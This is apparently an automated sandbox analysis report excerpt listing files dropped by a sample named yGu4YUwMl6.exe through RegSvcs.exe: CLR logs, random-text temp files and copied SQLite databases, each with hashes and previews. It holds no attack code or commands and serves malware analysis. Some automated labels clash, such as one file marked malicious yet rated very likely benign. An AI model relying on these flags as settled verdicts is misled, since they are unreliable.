                                                                                                                                              Entropy (8bit):5.345804351520589
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpH8HKx1qHxLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5JcE
                                                                                                                                              MD5:7ADCF08EB89A57934E566936815936CF
                                                                                                                                              SHA1:C164331AA17656919323F4464BC1FC1EB1B8CA90
                                                                                                                                              SHA-256:848A610C0FC09EF83A3DFC86A453C9B6F81DAA2A89779529254577F818E68933
                                                                                                                                              SHA-512:54EB0F3313760BC4C88C736C5CE57B1890BBCD00376445B3BFC3BB17C6ACBCE22700491D96B6E7E926892555B2AC0C62F0C31557F0E00C00EA38D225228212D3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yGu4YUwMl6.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\yGu4YUwMl6.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1216
                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp1596.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1026
                                                                                                                                              Entropy (8bit):4.692693183518806
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                              MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                              SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                              SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                              SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp15A6.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1026
                                                                                                                                              Entropy (8bit):4.699548026888946
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                              MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                              SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                              SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                              SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp15A7.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1026
                                                                                                                                              Entropy (8bit):4.692693183518806
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                              MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                              SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                              SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                              SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp15A8.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1026
                                                                                                                                              Entropy (8bit):4.699548026888946
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                              MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                              SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                              SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                              SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp270A.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp271A.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp272B.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp273B.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp274C.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp275D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):98304
                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D15.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D26.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D36.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D37.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
